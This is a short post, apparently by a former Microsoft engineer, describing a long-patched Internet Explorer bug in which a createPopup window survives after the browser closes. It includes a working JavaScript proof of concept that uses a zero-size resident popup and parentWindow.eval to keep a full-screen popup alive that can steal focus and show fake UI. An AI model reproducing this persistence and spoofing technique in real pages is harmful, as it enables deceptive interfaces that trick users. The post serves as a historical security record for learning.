This one surprised me quite a bit. A createPopup window that has been shown can outlive the browser itself. If the user closes IE while a modal-style alert from the popup is still open, the popup and all its scripting context remain active on screen. From that point the popup can steal focus, display fake UI, and execute arbitrary JavaScript — all while the browser appears to be closed.
<script language="JavaScript">
function code_createPopup()
{
alert("First close the browser and THEN click OK on this alert.");
parent.moveTo(0, 0);
parent.resizeTo(5000, 5000);
var cpApp = parent.createPopup();
cpApp.document.bgColor = "orange";
cpApp.show(0, 0, 800, 500);
cpApp.document.onmouseover = function()
{
cpApp.document.parentWindow.focus();
}
cpApp.document.onclick = function()
{
cpApp.document.body.innerHTML = '<font color="black" face="Arial" size="6">This is a fully working createPopup without a Browser.<br /><br />' +
'Math.random() every time you click me:<br /><br />' + Math.random() + '</font>';
}
cpApp.document.onclick();
cpApp.document.parentWindow.focus();
}
function main()
{
var cpResident = createPopup();
cpResident.show(0,0,0,0);
str_code_createPopup = returnCodeInsideFunction(code_createPopup);
cpResident.document.parentWindow.eval(str_code_createPopup);
}
</script>The trick is to use a zero-size createPopup as a resident context, evaluate the real popup code inside it via parentWindow.eval, and then present a modeless alert. When the user closes IE, the browser’s window goes away but the popup’s message loop is still spinning — the OS keeps the process alive. The popup can then present any UI it wants, including full-screen overlays, without any visible browser chrome.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.